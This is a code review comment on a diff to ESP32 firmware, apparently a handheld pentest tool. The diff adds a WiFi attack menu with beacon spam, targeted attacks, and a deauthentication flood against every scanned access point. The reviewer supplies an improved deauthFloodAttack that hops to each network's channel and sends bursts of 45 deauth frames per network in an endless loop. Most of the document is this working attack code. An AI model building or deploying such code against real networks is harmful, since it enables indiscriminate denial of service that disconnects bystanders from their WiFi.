history/src/modules/wifi/wifi_atks_20240802063120.cpp

```diff
@@ -0,0 +1,572 @@
+{
+  // desenhar a tela
+  drawMainBorder();
+  tft.setTextColor(FGCOLOR);
+  tft.drawCentreString("-=Information=-", tft.width() / 2, 28, SMOOTH_FONT);
+  tft.drawString("AP: " + tssid, 10, 48);
+  tft.drawString("Channel: " + String(channel), 10, 66);
+  tft.drawString(mac, 10, 84);
+  tft.drawString("Press " + String(BTN_ALIAS) + " to act", 10, tft.height() - 20);
+
+  delay(300);
+  while (!checkSelPress())
+  {
+    while (!checkSelPress())
+    {
+      yield();
+    } // timerless debounce
+    target_atk_menu(tssid, mac, channel);
+    returnToMenu = true;
+    break;
+  }
+}
+
+/***************************************************************************************
+** function: target_atk_menu
+** @brief: Open menu to choose which AP Attack
+***************************************************************************************/
+void wifi_atk_menu()
+{
+  bool scanAtks = false;
+  options = {
+      {"Target Atks", [&]()
+       { scanAtks = true; }},
+      {"Beacon SPAM", [=]()
+       { beaconAttack(); }},
+  };
+  delay(200);
+  loopOptions(options);
+  delay(200);
+  if (scanAtks)
+  {
+    int nets;
+    WiFi.mode(WIFI_MODE_STA);
+    displayRedStripe("Scanning..", TFT_WHITE, FGCOLOR);
+    nets = WiFi.scanNetworks();
+    ap_records.clear();
+    options = {};
+    for (int i = 0; i < nets; i++)
+    {
+      wifi_ap_record_t record;
+      memcpy(record.bssid, WiFi.BSSID(i), 6);
+      record.channel = static_cast<uint8_t>(WiFi.channel(i));
+      ap_records.push_back(record);
+
+      options.push_back({WiFi.SSID(i).c_str(), [=]()
+                         {
+                           target_atk_menu(WiFi.SSID(i).c_str(), WiFi.BSSIDstr(i), record.channel);
+                         }});
+    }
+
+    options.push_back({"Main Menu", [=]()
+                       { backToMenu(); }});
+
+    delay(200);
+    loopOptions(options);
+    delay(200);
+  }
+}
+
+void deauthFloodAttack()
+{
+  Serial.begin(115200);
+  WiFi.mode(WIFI_AP);
+  if (!WiFi.softAP("DeauthFlood", emptyString, 1, 1, 4, false))
+  {
+    displayError("Failed to start AP");
+    while (!checkSelPress())
+    {
+      yield();
+    }
+    return;
+  }
+  wifiConnected = true;
+
+  // Prepare deauth frame for each AP record
+  memcpy(deauth_frame, deauth_frame_default, sizeof(deauth_frame_default));
+
+  uint32_t lastTime = millis();
+  uint16_t count = 0;
+
+  while (true)
+  {
+    for (const auto &record : ap_records)
+    {
+      memcpy(&deauth_frame[10], record.bssid, 6);
+      memcpy(&deauth_frame[16], record.bssid, 6);
+      wsl_bypasser_send_raw_frame(deauth_frame, sizeof(deauth_frame_default));
+      count += 3;
+    }
+
+    // Update counter every 2 seconds
+    if (millis() - lastTime > 2000)
+    {
+      tft.setCursor(6, HEIGHT - 23);
+      tft.print("Frames: " + String(count / 2) + "/s");
+      count = 0;
+      lastTime = millis();
+    }
+
+    if (checkEscPress())
+      break;
+  }
+
+  wifiDisconnect();
+  returnToMenu = true;
```

Comment:
* in the deauthFloodAttack function, perform the Scan, to save the WiFi result array
* before sending the packet through the send_raw_frame (renamed function) function, it is important to change the WiFI channel to the same channel as the target Wi-Fi, you can do this with the wsl_bypasser_send_raw_frame(&ap_record, channel); function, this function already writes the frame and changes the channel
* after that you can send, for example, 45 packets to each network before moving on to the next network and so on

`void deauthFloodAttack()
{
  Serial.begin(115200);
  WiFi.mode(WIFI_AP);
  if (!WiFi.softAP("DeauthFlood", emptyString, 1, 1, 4, false))
  {
    displayError("Failed to start AP");
    while (!checkSelPress())
    {
      yield();
    }
    return;
  }
  wifiConnected = true;
  int nets;
  nets = WiFi.scanNetworks();
  // Prepare deauth frame for each AP record
  memcpy(deauth_frame, deauth_frame_default, sizeof(deauth_frame_default));

  uint32_t lastTime = millis();
  uint16_t count = 0;

  while (true)
  {
    for (i=0;i<nets;i++)
    {
      memcpy(ap_record.bssid, WiFi.BSSID(i), 6);
      uint8_t chan = static_cast<uint8_t>(WiFi.channel(i));
      wsl_bypasser_send_raw_frame(&ap_record, chan);
      for(int j = 0; j<15; j++) { // sends 15*3 frames to target.
           send_raw_frame(deauth_frame, sizeof(deauth_frame_default));
           count += 3;
      }
    }

    // Update counter every 2 seconds
    if (millis() - lastTime > 2000)
    {
      tft.setCursor(6, HEIGHT - 23);
      tft.print("Frames: " + String(count / 2) + "/s");
      count = 0;
      lastTime = millis();
    }

    if (checkEscPress())
      break;
  }

  wifiDisconnect();
  returnToMenu = true;
}`